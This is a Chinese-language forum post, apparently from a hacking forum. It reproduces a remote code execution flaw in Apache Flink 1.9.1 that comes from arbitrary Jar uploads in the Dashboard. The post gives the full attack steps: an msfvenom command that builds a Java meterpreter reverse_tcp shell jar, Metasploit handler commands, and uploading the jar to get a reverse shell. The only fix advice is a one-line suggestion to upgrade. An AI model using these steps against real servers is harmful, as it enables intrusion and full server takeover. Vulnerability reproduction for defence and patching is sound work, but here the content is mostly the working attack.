標題:Apache Flink 任意Jar 包上傳導致RCE 漏洞

taibeihacker

Moderator

Apache Flink 任意 Jar 包上传导致 RCE 漏洞​

Apache Flink 是一個分佈式大數據處理引擎,可對有限數據流和無限數據流進行有狀態計算。可部署在各種集群環境,對各種大小的數據規模進行快速計算。
ApacheFlink 是由Apache 軟件基金會開發的開源流處理框架,其核心是用Java 和Scala 編寫的分佈式流數據流引擎。 Flink 以數據並行和流水線方式執行任意流數據程序,Flink 的流水線運行時系統可以執行批處理和流處理程序。此外,Flink 的運行時本身也支持迭代算法的執行。
攻擊者可利用該漏洞在Apache Flink Dashboard 頁面中上傳任意Jar 包,利用Metasploit 在Apache Flink 服務器中執行任意代碼,獲取服務器最高權限,所以危害性較大。

影响范围​

Apache Flink=1.9.1

环境搭建​

下載Apache Flink 1.9.1 包:
1
wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
解壓安裝包:
1
tar –zxvf flink-1.9.1-bin-scala_2.11.tgz
進入到bin 目錄下面啟動Flink:
1
./start-cluster.sh
20191120100828.png-water_print

瀏覽器訪問:http://ip:8081

漏洞复现​

msf 生成reverse shell 的馬
1
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar shell.jar
msf 設置監聽
1
2
3
use exploit/multi/handler
set payload java/shell/reverse_tcp
expolit
20191120101314.png-water_print

上傳shell.jar 並提交
20191120101314.png-water_print

20191120101609.png-water_print

反彈回的shell
20191120101816.png-water_print

修复建议​

將Apache Flink 升級最新版本
 
返回
上方